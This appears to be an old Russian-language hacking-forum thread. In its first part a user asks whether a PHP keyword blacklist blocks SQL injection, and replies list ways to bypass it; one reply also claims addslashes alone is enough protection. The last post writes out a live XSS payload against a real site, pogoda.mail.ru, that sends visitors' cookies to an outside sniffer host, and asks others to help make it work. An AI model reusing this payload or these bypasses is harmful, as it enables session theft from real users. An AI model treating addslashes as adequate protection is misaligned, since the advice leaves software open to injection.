ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

11.09.2009, 23:24
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме: 69313
Репутация:
1
|
|
Всем привет. Такой вопрос, сможет ли отгородить от скл иньекций, класс который обрабатывает все POST и GET запросы и если находит в них такие запросы как:
' -- '
' /* '
' %00 '
срабатывает die();
|
|
|

11.09.2009, 23:25
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме: 10046345
Репутация:
4589
|
|
Нет.
|
|
|

11.09.2009, 23:26
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме: 69313
Репутация:
1
|
|
Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
Последний раз редактировалось IND1G0; 11.09.2009 в 23:31..
|
|
|

11.09.2009, 23:37
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме: 950638
Репутация:
256
|
|
Сообщение от IND1G0
Почему не защитит? Как можно обойти?
Не надо изобретать велосипед, всё уже придуманно до нас, фильтруй не фильтруй, а что то да забудешь, да и глупо это ... А обойти это можно очень легко
Сообщение от IND1G0
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
Тоже лажа выйдет  Обходится легко, ты лучше предоставь скрипт, а мы тебе скажем, как обойти 
Последний раз редактировалось DrAssault; 11.09.2009 в 23:40..
|
|
|

11.09.2009, 23:39
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от IND1G0
Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
не нужно писать свои чудофильтры, есть стандартные функции, просто нужно научиться ими пользоваться.
https://forum.antichat.ru/thread30641.html
|
|
|

11.09.2009, 23:40
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме: 10046345
Репутация:
4589
|
|
Сообщение от IND1G0
Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
Что ты херней то страдаешь? Фильтруй параметры через addslashes и все.
|
|
|

11.09.2009, 23:43
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме: 69313
Репутация:
1
|
|
Допустим вот
PHP код:
class InitVars {
# Недопустимые слова в запросах
var $deny_words = array("union","char","select","update","group","order","benchmark");
function checkVars()# Метод проверяет $_GET и $_POST переменные на наличие опасных данных и SQL инъекций
{
global $DB;
//Проверка опасных данных.
$_VAR = array_merge ( $_POST, $_GET);
foreach($_VAR as $_ind => $_val)
{
$exp = explode(" ",$_val);
foreach($exp as $ind => $val)
{
if(in_array(strtolower($val),$this->deny_words) OR stristr($val,"--") OR stristr($val,"/*") OR stristr($val,"%00")) $this->antihack("Ваш запрос не может быть обработан системой.");
}
}
}
}
Те кто меня учит фильтровать отвечаю - не надо меня учить я и сам все прекрасно знаю, как все фильтруется...я задал другой вопрос...
|
|
|

11.09.2009, 23:48
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме: 10046345
Репутация:
4589
|
|
И ты уверен, что все и всегда юзают пробел? Что будет с твоим фильтром, если вместо пробела окажется табуляция или переход на новую строку? Запрос так же можно обрезать с помошью #. И не забывай о фрагментированных иньекциях (кавычку отфильтровали, но слеш - нет, благодаря чему, в зависимости от запроса, один хер можно провести иньекцию). Ах да, можно обойтись и без табов с каретками, юзая скобки.
Последний раз редактировалось BlackSun; 11.09.2009 в 23:52..
|
|
|

12.09.2009, 00:01
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме: 69313
Репутация:
1
|
|
спасибо, все понял 
|
|
|

12.09.2009, 17:40
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме: 82669
Репутация:
-26
|
|
Опять вопросик у меня.
Нашёл xss:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ea lert(%27xss%27)%3C/script%3E
Захожу на ссылку срабатывает alert и показывает рамку xss.
Пошёл на сниффер http://hacker-pro.net/sniffer/ и сделал редикет, но не сработало, даже взов не бросает снифферу, так-как лог пустой.
Ну решил поменять сниффер и пошёл на сниффер www.sniffer.xaknet.ru и сделал следующее:
вставил ссылку из сниффер вместо alert:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;</script>
и так испробовал несколько ссылок, но лог ПУСТОЙ! Что делать?
А можете сами быстринко поставить нужную ссылку и джать мне адрес сниффера, а потом я буду эксприментировать и найду разницу и свою ошибку.
Поможете?
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|